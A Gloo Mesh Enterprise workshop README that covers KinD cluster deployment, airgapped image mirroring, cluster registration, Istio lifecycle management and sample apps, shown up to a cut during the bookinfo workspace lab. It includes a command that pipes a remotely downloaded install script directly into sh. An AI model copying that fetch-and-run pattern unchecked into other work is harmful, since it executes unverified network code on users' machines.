- Introduction
- Lab 1 - Deploy KinD clusters
- Lab 2 - Prepare airgap environment
- Lab 3 - Deploy and register Gloo Mesh
- Lab 4 - Deploy Istio using Gloo Mesh Lifecycle Manager
- Lab 5 - Deploy the Bookinfo demo app
- Lab 6 - Deploy the httpbin demo app
- Lab 7 - Deploy Gloo Mesh Addons
- Lab 8 - Create the gateways workspace
- Lab 9 - Create the bookinfo workspace
- Lab 10 - Expose the productpage through a gateway
- Lab 11 - Traffic policies
- Lab 12 - Create the Root Trust Policy
- Lab 13 - Leverage Virtual Destinations
- Lab 14 - Zero trust
- Lab 15 - Create the httpbin workspace
- Lab 16 - Expose an external service
- Lab 17 - Deploy Keycloak
- Lab 18 - Securing the access with OAuth
- Lab 19 - Use the JWT filter to create headers from claims
- Lab 20 - Use the transformation filter to manipulate headers
- Lab 21 - Apply rate limiting to the Gateway
- Lab 22 - Use the Web Application Firewall filter
Gloo Mesh Enterprise is a management plane which makes it easy to operate Istio on one or many Kubernetes clusters deployed anywhere (any platform, anywhere).
The Gloo Mesh Enterprise subscription includes end to end Istio support:
- Upstream first
- Specialty builds available (FIPS, ARM, etc)
- Long Term Support (LTS) N-4
- Critical security patches
- Production break-fix
- One hour SLA Severity 1
- Install / upgrade
- Architecture and operational guidance, best practices
Gloo Mesh provides many unique features, including:
- multi-tenancy based on global workspaces
- zero trust enforcement
- global observability (centralized metrics and access logging)
- simplified cross cluster communications (using virtual destinations)
- advanced gateway capabilities (oauth, jwt, transformations, rate limiting, web application firewall, ...)
You can find more information about Gloo Mesh in the official documentation:
https://docs.solo.io/gloo-mesh/latest/
Clone this repository and go to the directory where this README.md
file is.
Set the context environment variables:
export MGMT=mgmt
export CLUSTER1=cluster1
export CLUSTER2=cluster2
Note that in case you dont't have a Kubernetes cluster dedicated for the management plane, you would set the variables like that:
export MGMT=cluster1 export CLUSTER1=cluster1 export CLUSTER2=cluster2
Run the following commands to deploy three Kubernetes clusters using Kind:
./scripts/deploy.sh 1 mgmt
./scripts/deploy.sh 2 cluster1 us-west us-west-1
./scripts/deploy.sh 3 cluster2 us-west us-west-2
Then run the following commands to wait for all the Pods to be ready:
./scripts/check.sh mgmt
./scripts/check.sh cluster1
./scripts/check.sh cluster2
Note: If you run the check.sh
script immediately after the deploy.sh
script, you may see a jsonpath error. If that happens, simply wait a few seconds and try again.
Once the check.sh
script completes, when you execute the kubectl get pods -A
command, you should see the following:
NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system calico-kube-controllers-59d85c5c84-sbk4k 1/1 Running 0 4h26m
kube-system calico-node-przxs 1/1 Running 0 4h26m
kube-system coredns-6955765f44-ln8f5 1/1 Running 0 4h26m
kube-system coredns-6955765f44-s7xxx 1/1 Running 0 4h26m
kube-system etcd-cluster1-control-plane 1/1 Running 0 4h27m
kube-system kube-apiserver-cluster1-control-plane 1/1 Running 0 4h27m
kube-system kube-controller-manager-cluster1-control-plane1/1 Running 0 4h27m
kube-system kube-proxy-ksvzw 1/1 Running 0 4h26m
kube-system kube-scheduler-cluster1-control-plane 1/1 Running 0 4h27m
local-path-storage local-path-provisioner-58f6947c7-lfmdx 1/1 Running 0 4h26m
metallb-system controller-5c9894b5cd-cn9x2 1/1 Running 0 4h26m
metallb-system speaker-d7jkp 1/1 Running 0 4h26m
You can see that your currently connected to this cluster by executing the kubectl config get-contexts
command:
CURRENT NAME CLUSTER AUTHINFO NAMESPACE
cluster1 kind-cluster1 cluster1
* cluster2 kind-cluster2 cluster2
mgmt kind-mgmt kind-mgmt
Run the following command to make mgmt
the current cluster.
kubectl config use-context ${MGMT}
Set the registry variable:
registry=localhost:5000
Pull and push locally the Docker images needed:
cat <<EOF > images.txt
us-docker.pkg.dev/gloo-mesh/istio-workshops/operator:1.17.1-solo
us-docker.pkg.dev/gloo-mesh/istio-workshops/pilot:1.17.1-solo
us-docker.pkg.dev/gloo-mesh/istio-workshops/proxyv2:1.17.1-solo
quay.io/keycloak/keycloak:20.0.1
docker.io/kennethreitz/httpbin
EOF
for url in https://raw.githubusercontent.com/istio/istio/release-1.16/samples/bookinfo/platform/kube/bookinfo.yaml https://raw.githubusercontent.com/istio/istio/release-1.16/samples/bookinfo/networking/bookinfo-gateway.yaml
do
for image in $(curl -sfL ${url}|grep image:|awk '{print $2}')
do
echo $image >> images.txt
done
done
wget https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-agent/gloo-mesh-agent-2.2.6.tgz
tar zxvf gloo-mesh-agent-*.tgz
find gloo-mesh-agent -name "values.yaml" | while read file; do
cat $file | yq eval -j | jq -r '.. | .image? | select(. != null) | (if .hub then .hub + "/" + .repository + ":" + .tag else (if .registry then (if .registry == "docker.io" then "docker.io/library" else .registry end) + "/" else "" end) + .repository + ":" + (.tag | tostring) end)'
done | sort -u >> images.txt
wget https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-enterprise/gloo-mesh-enterprise-2.2.6.tgz
tar zxvf gloo-mesh-enterprise-*.tgz
find gloo-mesh-enterprise -name "values.yaml" | while read file; do
cat $file | yq eval -j | jq -r '.. | .image? | select(. != null) | (if .hub then .hub + "/" + .repository + ":" + .tag else (if .registry then (if .registry == "docker.io" then "docker.io/library" else .registry end) + "/" else "" end) + .repository + ":" + (.tag | tostring) end)'
done | sort -u >> images.txt
cat images.txt | while read image; do
nohup sh -c "echo $image | xargs -P10 -n1 docker pull" </dev/null >nohup.out 2>nohup.err &
done
cat images.txt | while read image; do
src=$(echo $image | sed 's/^docker\.io\///g' | sed 's/^library\///g')
dst=$(echo $image | awk -F/ '{ if(NF>3){ print $3"/"$4}else{if(NF>2){ print $2"/"$3}else{if($1=="docker.io"){print $2}else{print $1"/"$2}}}}' | sed 's/^library\///g')
docker pull $image
id=$(docker images $src --format "{{.ID}}")
docker tag $id ${registry}/$dst
docker push ${registry}/$dst
done
First of all, let's install the meshctl
CLI:
export GLOO_MESH_VERSION=v2.2.6
curl -sL https://run.solo.io/meshctl/install | sh -
export PATH=$HOME/.gloo-mesh/bin:$PATH
Run the following commands to deploy the Gloo Mesh management plane:
helm repo add gloo-mesh-enterprise https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-enterprise
helm repo update
kubectl --context ${MGMT} create ns gloo-mesh
helm upgrade --install gloo-mesh-enterprise gloo-mesh-enterprise/gloo-mesh-enterprise \
--namespace gloo-mesh --kube-context ${MGMT} \
--version=2.2.6 \
--set glooMeshMgmtServer.ports.healthcheck=8091 \
--set legacyMetricsPipeline.enabled=false \
--set metricsgateway.enabled=true \
--set metricsgateway.service.type=LoadBalancer \
--set glooMeshMgmtServer.image.registry=${registry}/gloo-mesh \
--set glooMeshUi.image.registry=${registry}/gloo-mesh \
--set glooMeshUi.sidecars.console.image.registry=${registry}/gloo-mesh \
--set glooMeshUi.sidecars.envoy.image.registry=${registry}/gloo-mesh \
--set metricsgateway.image.repository=${registry}/gloo-mesh/gloo-otel-collector \
--set prometheus.configmapReload.prometheus.image.repository=${registry}/jimmidyson/configmap-reload \
--set prometheus.server.image.repository=${registry}/prometheus/prometheus \
--set glooMeshRedis.image.registry=${registry} \
--set glooMeshUi.serviceType=LoadBalancer \
--set mgmtClusterName=${MGMT} \
--set global.cluster=${MGMT} \
--set licenseKey=${GLOO_MESH_LICENSE_KEY}
kubectl --context ${MGMT} -n gloo-mesh rollout status deploy/gloo-mesh-mgmt-server
Then, you need to set the environment variable to tell the Gloo Mesh agents how to communicate with the management plane:
export ENDPOINT_GLOO_MESH=$(kubectl --context ${MGMT} -n gloo-mesh get svc gloo-mesh-mgmt-server -o jsonpath='{.status.loadBalancer.ingress[0].*}'):9900
export HOST_GLOO_MESH=$(echo ${ENDPOINT_GLOO_MESH} | cut -d: -f1)
export ENDPOINT_METRICS_GATEWAY=$(kubectl --context ${MGMT} -n gloo-mesh get svc gloo-metrics-gateway -o jsonpath='{.status.loadBalancer.ingress[0].*}'):4317
Check that the variables have correct values:
echo $HOST_GLOO_MESH
echo $ENDPOINT_GLOO_MESH
Finally, you need to register the cluster(s).
Here is how you register the first one:
helm repo add gloo-mesh-agent https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-agent
helm repo update
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: KubernetesCluster
metadata:
name: cluster1
namespace: gloo-mesh
spec:
clusterDomain: cluster.local
EOF
kubectl --context ${CLUSTER1} create ns gloo-mesh
kubectl get secret relay-root-tls-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.ca\.crt}' | base64 -d > ca.crt
kubectl create secret generic relay-root-tls-secret -n gloo-mesh --context ${CLUSTER1} --from-file ca.crt=ca.crt
rm ca.crt
kubectl get secret relay-identity-token-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.token}' | base64 -d > token
kubectl create secret generic relay-identity-token-secret -n gloo-mesh --context ${CLUSTER1} --from-file token=token
rm token
helm upgrade --install gloo-mesh-agent gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh \
--kube-context=${CLUSTER1} \
--set relay.serverAddress=${ENDPOINT_GLOO_MESH} \
--set relay.authority=gloo-mesh-mgmt-server.gloo-mesh \
--set rate-limiter.enabled=false \
--set ext-auth-service.enabled=false \
--set glooMeshPortalServer.enabled=false \
--set cluster=cluster1 \
--set metricscollector.enabled=true \
--set metricscollector.config.exporters.otlp.endpoint=\"${ENDPOINT_METRICS_GATEWAY}\" \
--set glooMeshAgent.image.registry=${registry}/gloo-mesh \
--set metricscollector.image.repository=${registry}/gloo-mesh/gloo-otel-collector \
--version 2.2.6
Note that the registration can also be performed using meshctl cluster register
.
And here is how you register the second one:
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: KubernetesCluster
metadata:
name: cluster2
namespace: gloo-mesh
spec:
clusterDomain: cluster.local
EOF
kubectl --context ${CLUSTER2} create ns gloo-mesh
kubectl get secret relay-root-tls-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.ca\.crt}' | base64 -d > ca.crt
kubectl create secret generic relay-root-tls-secret -n gloo-mesh --context ${CLUSTER2} --from-file ca.crt=ca.crt
rm ca.crt
kubectl get secret relay-identity-token-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.token}' | base64 -d > token
kubectl create secret generic relay-identity-token-secret -n gloo-mesh --context ${CLUSTER2} --from-file token=token
rm token
helm upgrade --install gloo-mesh-agent gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh \
--kube-context=${CLUSTER2} \
--set relay.serverAddress=${ENDPOINT_GLOO_MESH} \
--set relay.authority=gloo-mesh-mgmt-server.gloo-mesh \
--set rate-limiter.enabled=false \
--set ext-auth-service.enabled=false \
--set glooMeshPortalServer.enabled=false \
--set cluster=cluster2 \
--set metricscollector.enabled=true \
--set metricscollector.config.exporters.otlp.endpoint=\"${ENDPOINT_METRICS_GATEWAY}\" \
--set glooMeshAgent.image.registry=${registry}/gloo-mesh \
--set metricscollector.image.repository=${registry}/gloo-mesh/gloo-otel-collector \
--version 2.2.6
You can check the cluster(s) have been registered correctly using the following commands:
meshctl --kubecontext ${MGMT} check
pod=$(kubectl --context ${MGMT} -n gloo-mesh get pods -l app=gloo-mesh-mgmt-server -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${MGMT} -n gloo-mesh debug -q -i ${pod} --image=curlimages/curl -- curl -s http://localhost:9091/metrics | grep relay_push_clients_connected
You should get an output similar to this:
# HELP relay_push_clients_connected Current number of connected Relay push clients (Relay Agents).
# TYPE relay_push_clients_connected gauge
relay_push_clients_connected{cluster="cluster1"} 1
relay_push_clients_connected{cluster="cluster2"} 1
Finally, you need to specify which gateways you want to use for cross cluster traffic:
cat <<EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: global
namespace: gloo-mesh
spec:
options:
eastWestGateways:
- selector:
labels:
istio: eastwestgateway
EOF
We are going to deploy Istio using Gloo Mesh Lifecycle Manager.
First of all, let's create Kubernetes services for the gateways:
registry=localhost:5000
kubectl --context ${CLUSTER1} create ns istio-gateways
kubectl --context ${CLUSTER1} label namespace istio-gateways istio.io/rev=1-17 --overwrite
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: ingressgateway
name: istio-ingressgateway
namespace: istio-gateways
spec:
ports:
- name: http2
port: 80
protocol: TCP
targetPort: 8080
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: istio-ingressgateway
istio: ingressgateway
revision: 1-17
type: LoadBalancer
EOF
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: eastwestgateway
topology.istio.io/network: cluster1
name: istio-eastwestgateway
namespace: istio-gateways
spec:
ports:
- name: status-port
port: 15021
protocol: TCP
targetPort: 15021
- name: tls
port: 15443
protocol: TCP
targetPort: 15443
- name: https
port: 16443
protocol: TCP
targetPort: 16443
- name: tcp-istiod
port: 15012
protocol: TCP
targetPort: 15012
- name: tcp-webhook
port: 15017
protocol: TCP
targetPort: 15017
selector:
app: istio-ingressgateway
istio: eastwestgateway
revision: 1-17
topology.istio.io/network: cluster1
type: LoadBalancer
EOF
kubectl --context ${CLUSTER2} create ns istio-gateways
kubectl --context ${CLUSTER2} label namespace istio-gateways istio.io/rev=1-17 --overwrite
cat << EOF | kubectl --context ${CLUSTER2} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: ingressgateway
name: istio-ingressgateway
namespace: istio-gateways
spec:
ports:
- name: http2
port: 80
protocol: TCP
targetPort: 8080
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: istio-ingressgateway
istio: ingressgateway
revision: 1-17
type: LoadBalancer
EOF
cat << EOF | kubectl --context ${CLUSTER2} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: eastwestgateway
topology.istio.io/network: cluster2
name: istio-eastwestgateway
namespace: istio-gateways
spec:
ports:
- name: status-port
port: 15021
protocol: TCP
targetPort: 15021
- name: tls
port: 15443
protocol: TCP
targetPort: 15443
- name: https
port: 16443
protocol: TCP
targetPort: 16443
- name: tcp-istiod
port: 15012
protocol: TCP
targetPort: 15012
- name: tcp-webhook
port: 15017
protocol: TCP
targetPort: 15017
selector:
app: istio-ingressgateway
istio: eastwestgateway
revision: 1-17
topology.istio.io/network: cluster2
type: LoadBalancer
EOF
It allows us to have full control on which Istio revision we want to use.
Then, we can tell Gloo Mesh to deploy the Istio control planes and the gateways in the cluster(s)
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: IstioLifecycleManager
metadata:
name: cluster1-installation
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster1
defaultRevision: true
revision: 1-17
istioOperatorSpec:
profile: minimal
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
namespace: istio-system
values:
global:
meshID: mesh1
multiCluster:
clusterName: cluster1
network: cluster1
meshConfig:
accessLogFile: /dev/stdout
defaultConfig:
proxyMetadata:
ISTIO_META_DNS_CAPTURE: "true"
ISTIO_META_DNS_AUTO_ALLOCATE: "true"
components:
pilot:
k8s:
env:
- name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES
value: "false"
ingressGateways:
- name: istio-ingressgateway
enabled: false
EOF
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster1-ingress
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster1
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-ingressgateway
namespace: istio-gateways
enabled: true
label:
istio: ingressgateway
---
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster1-eastwest
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster1
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-eastwestgateway
namespace: istio-gateways
enabled: true
label:
istio: eastwestgateway
topology.istio.io/network: cluster1
k8s:
env:
- name: ISTIO_META_ROUTER_MODE
value: "sni-dnat"
- name: ISTIO_META_REQUESTED_NETWORK_VIEW
value: cluster1
EOF
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: IstioLifecycleManager
metadata:
name: cluster2-installation
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster2
defaultRevision: true
revision: 1-17
istioOperatorSpec:
profile: minimal
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
namespace: istio-system
values:
global:
meshID: mesh1
multiCluster:
clusterName: cluster2
network: cluster2
meshConfig:
accessLogFile: /dev/stdout
defaultConfig:
proxyMetadata:
ISTIO_META_DNS_CAPTURE: "true"
ISTIO_META_DNS_AUTO_ALLOCATE: "true"
components:
pilot:
k8s:
env:
- name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES
value: "false"
ingressGateways:
- name: istio-ingressgateway
enabled: false
EOF
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster2-ingress
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster2
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-ingressgateway
namespace: istio-gateways
enabled: true
label:
istio: ingressgateway
---
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster2-eastwest
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster2
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-eastwestgateway
namespace: istio-gateways
enabled: true
label:
istio: eastwestgateway
topology.istio.io/network: cluster2
k8s:
env:
- name: ISTIO_META_ROUTER_MODE
value: "sni-dnat"
- name: ISTIO_META_REQUESTED_NETWORK_VIEW
value: cluster2
EOF
Set the environment variable for the service corresponding to the Istio Ingress Gateway of the cluster(s):
export ENDPOINT_HTTP_GW_CLUSTER1=$(kubectl --context ${CLUSTER1} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):80
export ENDPOINT_HTTPS_GW_CLUSTER1=$(kubectl --context ${CLUSTER1} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):443
export HOST_GW_CLUSTER1=$(echo ${ENDPOINT_HTTP_GW_CLUSTER1} | cut -d: -f1)
export ENDPOINT_HTTP_GW_CLUSTER2=$(kubectl --context ${CLUSTER2} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):80
export ENDPOINT_HTTPS_GW_CLUSTER2=$(kubectl --context ${CLUSTER2} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):443
export HOST_GW_CLUSTER2=$(echo ${ENDPOINT_HTTP_GW_CLUSTER2} | cut -d: -f1)
We're going to deploy the bookinfo application to demonstrate several features of Gloo Mesh.
You can find more information about this application here. Download the bookinfo yaml and update the registry:
curl https://raw.githubusercontent.com/istio/istio/release-1.16/samples/bookinfo/platform/kube/bookinfo.yaml | sed "s/image: docker.io/image: ${registry}/g" > bookinfo.yaml
Run the following commands to deploy the bookinfo application on cluster1
:
kubectl --context ${CLUSTER1} create ns bookinfo-frontends
kubectl --context ${CLUSTER1} create ns bookinfo-backends
kubectl --context ${CLUSTER1} label namespace bookinfo-frontends istio.io/rev=1-17 --overwrite
kubectl --context ${CLUSTER1} label namespace bookinfo-backends istio.io/rev=1-17 --overwrite
# deploy the frontend bookinfo service in the bookinfo-frontends namespace
kubectl --context ${CLUSTER1} -n bookinfo-frontends apply -f bookinfo.yaml -l 'account in (productpage)'
kubectl --context ${CLUSTER1} -n bookinfo-frontends apply -f bookinfo.yaml -l 'app in (productpage)'
kubectl --context ${CLUSTER1} -n bookinfo-backends apply -f bookinfo.yaml -l 'account in (reviews,ratings,details)'
# deploy the backend bookinfo services in the bookinfo-backends namespace for all versions less than v3
kubectl --context ${CLUSTER1} -n bookinfo-backends apply -f bookinfo.yaml -l 'app in (reviews,ratings,details),version notin (v3)'
# Update the productpage deployment to set the environment variables to define where the backend services are running
kubectl --context ${CLUSTER1} -n bookinfo-frontends set env deploy/productpage-v1 DETAILS_HOSTNAME=details.bookinfo-backends.svc.cluster.local
kubectl --context ${CLUSTER1} -n bookinfo-frontends set env deploy/productpage-v1 REVIEWS_HOSTNAME=reviews.bookinfo-backends.svc.cluster.local
# Update the reviews service to display where it is coming from
kubectl --context ${CLUSTER1} -n bookinfo-backends set env deploy/reviews-v1 CLUSTER_NAME=${CLUSTER1}
kubectl --context ${CLUSTER1} -n bookinfo-backends set env deploy/reviews-v2 CLUSTER_NAME=${CLUSTER1}
You can check that the app is running using the following command:
kubectl --context ${CLUSTER1} -n bookinfo-frontends get pods && kubectl --context ${CLUSTER1} -n bookinfo-backends get pods
Note that we deployed the productpage
service in the bookinfo-frontends
namespace and the other services in the bookinfo-backends
namespace.
And we deployed the v1
and v2
versions of the reviews
microservice, not the v3
version.
Now, run the following commands to deploy the bookinfo application on cluster2
:
kubectl --context ${CLUSTER2} create ns bookinfo-frontends
kubectl --context ${CLUSTER2} create ns bookinfo-backends
kubectl --context ${CLUSTER2} label namespace bookinfo-frontends istio.io/rev=1-17 --overwrite
kubectl --context ${CLUSTER2} label namespace bookinfo-backends istio.io/rev=1-17 --overwrite
# deploy the frontend bookinfo service in the bookinfo-frontends namespace
kubectl --context ${CLUSTER2} -n bookinfo-frontends apply -f bookinfo.yaml -l 'account in (productpage)'
kubectl --context ${CLUSTER2} -n bookinfo-frontends apply -f bookinfo.yaml -l 'app in (productpage)'
kubectl --context ${CLUSTER2} -n bookinfo-backends apply -f bookinfo.yaml -l 'account in (reviews,ratings,details)'
# deploy the backend bookinfo services in the bookinfo-backends namespace for all versions
kubectl --context ${CLUSTER2} -n bookinfo-backends apply -f bookinfo.yaml -l 'app in (reviews,ratings,details)'
# Update the productpage deployment to set the environment variables to define where the backend services are running
kubectl --context ${CLUSTER2} -n bookinfo-frontends set env deploy/productpage-v1 DETAILS_HOSTNAME=details.bookinfo-backends.svc.cluster.local
kubectl --context ${CLUSTER2} -n bookinfo-frontends set env deploy/productpage-v1 REVIEWS_HOSTNAME=reviews.bookinfo-backends.svc.cluster.local
# Update the reviews service to display where it is coming from
kubectl --context ${CLUSTER2} -n bookinfo-backends set env deploy/reviews-v1 CLUSTER_NAME=${CLUSTER2}
kubectl --context ${CLUSTER2} -n bookinfo-backends set env deploy/reviews-v2 CLUSTER_NAME=${CLUSTER2}
kubectl --context ${CLUSTER2} -n bookinfo-backends set env deploy/reviews-v3 CLUSTER_NAME=${CLUSTER2}
You can check that the app is running using:
kubectl --context ${CLUSTER2} -n bookinfo-frontends get pods && kubectl --context ${CLUSTER2} -n bookinfo-backends get pods
As you can see, we deployed all three versions of the reviews
microservice on this cluster.
We're going to deploy the httpbin application to demonstrate several features of Gloo Mesh.
You can find more information about this application here.
Run the following commands to deploy the httpbin app on cluster1
. The deployment will be called not-in-mesh
and won't have the sidecar injected (because we don't label the namespace).
kubectl --context ${CLUSTER1} create ns httpbin
kubectl --context ${CLUSTER1} apply -n httpbin -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: not-in-mesh
---
apiVersion: v1
kind: Service
metadata:
name: not-in-mesh
labels:
app: not-in-mesh
service: not-in-mesh
spec:
ports:
- name: http
port: 8000
targetPort: 80
selector:
app: not-in-mesh
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: not-in-mesh
spec:
replicas: 1
selector:
matchLabels:
app: not-in-mesh
version: v1
template:
metadata:
labels:
app: not-in-mesh
version: v1
spec:
serviceAccountName: not-in-mesh
containers:
- image: ${registry}/kennethreitz/httpbin
imagePullPolicy: IfNotPresent
name: not-in-mesh
ports:
- containerPort: 80
EOF
Then, we deploy a second version, which will be called in-mesh
and will have the sidecar injected (because of the label istio.io/rev
in the Pod template).
kubectl --context ${CLUSTER1} apply -n httpbin -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: in-mesh
---
apiVersion: v1
kind: Service
metadata:
name: in-mesh
labels:
app: in-mesh
service: in-mesh
spec:
ports:
- name: http
port: 8000
targetPort: 80
selector:
app: in-mesh
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: in-mesh
spec:
replicas: 1
selector:
matchLabels:
app: in-mesh
version: v1
template:
metadata:
labels:
app: in-mesh
version: v1
istio.io/rev: 1-17
spec:
serviceAccountName: in-mesh
containers:
- image: ${registry}/kennethreitz/httpbin
imagePullPolicy: IfNotPresent
name: in-mesh
ports:
- containerPort: 80
EOF
You can follow the progress using the following command:
kubectl --context ${CLUSTER1} -n httpbin get pods
NAME READY STATUS RESTARTS AGE
in-mesh-5d9d9549b5-qrdgd 2/2 Running 0 11s
not-in-mesh-5c64bb49cd-m9kwm 1/1 Running 0 11s
To use the Gloo Mesh Gateway advanced features (external authentication, rate limiting, ...), you need to install the Gloo Mesh addons.
First, you need to create a namespace for the addons, with Istio injection enabled:
kubectl --context ${CLUSTER1} create namespace gloo-mesh-addons
kubectl --context ${CLUSTER1} label namespace gloo-mesh-addons istio.io/rev=1-17 --overwrite
kubectl --context ${CLUSTER2} create namespace gloo-mesh-addons
kubectl --context ${CLUSTER2} label namespace gloo-mesh-addons istio.io/rev=1-17 --overwrite
Then, you can deploy the addons on the cluster(s) using Helm:
helm upgrade --install gloo-mesh-agent-addons gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh-addons \
--kube-context=${CLUSTER1} \
--set cluster=cluster1 \
--set glooMeshAgent.enabled=false \
--set glooMeshPortalServer.enabled=true \
--set rate-limiter.enabled=true \
--set ext-auth-service.enabled=true \
--set ext-auth-service.extAuth.image.registry=${registry}/gloo-mesh \
--set rate-limiter.rateLimiter.image.registry=${registry}/gloo-mesh \
--set rate-limiter.redis.image.registry=${registry} \
--version 2.2.6
helm upgrade --install gloo-mesh-agent-addons gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh-addons \
--kube-context=${CLUSTER2} \
--set cluster=cluster2 \
--set glooMeshAgent.enabled=false \
--set glooMeshPortalServer.enabled=true \
--set rate-limiter.enabled=true \
--set ext-auth-service.enabled=true \
--set ext-auth-service.extAuth.image.registry=${registry}/gloo-mesh \
--set rate-limiter.rateLimiter.image.registry=${registry}/gloo-mesh \
--set rate-limiter.redis.image.registry=${registry} \
--version 2.2.6
This is how to environment looks like now:
We're going to create a workspace for the team in charge of the Gateways.
The platform team needs to create the corresponding Workspace
Kubernetes objects in the Gloo Mesh management cluster.
Let's create the gateways
workspace which corresponds to the istio-gateways
and the gloo-mesh-addons
namespaces on the cluster(s):
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: Workspace
metadata:
name: gateways
namespace: gloo-mesh
spec:
workloadClusters:
- name: cluster1
namespaces:
- name: istio-gateways
- name: gloo-mesh-addons
- name: cluster2
namespaces:
- name: istio-gateways
- name: gloo-mesh-addons
EOF
Then, the Gateway team creates a WorkspaceSettings
Kubernetes object in one of the namespaces of the gateways
workspace (so the istio-gateways
or the gloo-mesh-addons
namespace):
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: gateways
namespace: istio-gateways
spec:
importFrom:
- workspaces:
- selector:
allow_ingress: "true"
resources:
- kind: SERVICE
- kind: ALL
labels:
expose: "true"
exportTo:
- workspaces:
- selector:
allow_ingress: "true"
resources:
- kind: SERVICE
EOF
The Gateway team has decided to import the following from the workspaces that have the label allow_ingress
set to true
(using a selector):
- all the Kubernetes services exported by these workspaces
- all the resources (RouteTables, VirtualDestination, ...) exported by these workspaces that have the label
expose
set totrue
We're going to create a workspace for the team in charge of the Bookinfo application.
The platform team needs to create the corresponding Workspace
Kubernetes objects in the Gloo Mesh management cluster.
Let's create the bookinfo
workspace which corresponds to the bookinfo-frontends
and bookinfo-backends
namespaces on the cluster(s):
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: Workspace
metadata:
name: bookinfo
namespace: gloo-mesh
labels:
allow_ingress: "true"
spec:
workloadClusters:
- name: cluster1
namespaces:
- name: bookinfo-frontends
- name: bookinfo-backends
- name: cluster2
namespaces:
- name: bookinfo-frontends
- name: bookinfo-backends
EOF
Then, the Bookinfo team creates a WorkspaceSettings
Kubernetes object in one of the namespaces of the bookinfo
workspace (so the bookinfo-frontends
or the bookinfo-backends
namespace):
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: bookinfo
namespace: bookinfo-frontends
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: productpage
- kind: SERVICE
labels:
app: reviews
